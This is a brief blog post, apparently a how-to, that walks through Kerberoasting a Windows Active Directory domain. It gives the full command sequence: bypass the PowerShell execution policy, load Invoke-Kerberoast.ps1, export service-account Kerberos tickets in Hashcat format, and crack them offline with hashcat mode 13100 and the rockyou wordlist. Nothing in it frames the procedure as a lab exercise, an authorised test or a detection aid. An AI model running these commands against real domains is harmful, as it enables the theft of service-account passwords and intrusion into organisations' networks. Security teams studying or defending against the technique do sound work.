Post

How to Kerberoast

Posted Updated
By Alexander Wells
1 min read
  1. Prerequisites
  2. PowerShell
  3. Import & Run
  4. Crack Tokens

Prerequisites

Make sure you’re on a domain joined computer, or are running PowerShell in the context of a domain user.

Download the required script from Github here, or a local copy can be found here.


PowerShell

Enable script execution:

1

powershell –ExecutionPolicy Bypass


Import & Run

Import the Kerberoast module:

1

Import-Module .\Invoke-Kerberoast.ps1

Run Invoke-Kerberoast:

1

Invoke-Kerberoast -OutputFormat Hashcat | Export-Csv -Path kerb.csv


Crack Tokens

From the output CSV file, copy the tickets from the Hash column.

Paste these tickets into a text file tickets.txt.

You can use the following command in PowerShell to attempt to crack the tickets with Hashcat:

1

.\hashcat64.exe -m 13100 -a 0 .\tickets.txt .\rockyou.txt
security, windows
security windows kerberos ad powershell passwords hashes
This post is licensed under CC BY 4.0 by the author.